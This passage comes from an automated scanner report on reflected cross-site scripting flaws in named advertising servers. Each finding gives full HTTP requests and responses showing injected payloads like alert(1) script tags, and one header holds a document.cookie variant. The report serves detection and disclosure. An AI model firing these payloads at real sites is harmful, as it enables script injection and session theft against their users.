Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";

...[SNIP]...

4.19. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
.net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/computers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/homepage

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.25. http://ad.harrenmedianetwork.com/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x60097345'-alert(1)-'e55a08937c8&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x60097345%27-alert%281%29-%27e55a08937c8%26s%3D429613%26_salt%3D975924496%26B%3D10%
...[SNIP]...

4.26. http://ad.harrenmedianetwork.com/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613d6cd7'-alert(1)-'948355e44c0&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D429613d6cd7%27-alert%281%29-%27948355e44c0%26_salt%3D975924496%26B%3D10%26u%3Dhttp%253A%
...[SNIP]...

4.27. http://ad.harrenmedianetwork.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&inv_code=429613&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600f9b92"><script>alert(1)</script>9e1c2d8085e&s=429613&t=2" target="parent">
...[SNIP]...

4.28. http://ad.harrenmedianetwork.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x6008e920'-alert(1)-'fcb38195981&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x6008e920%27-alert%281%29-%27fcb38195981%26section%3D429613">
...[SNIP]...

4.29. http://ad.harrenmedianetwork.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f47e8'-alert(1)-'64ed47f711b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x600%26section%3D429613f47e8%27-alert%281%29-%2764ed47f711b">
...[SNIP]...

4.30. http://ad.harrenmedianetwork.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

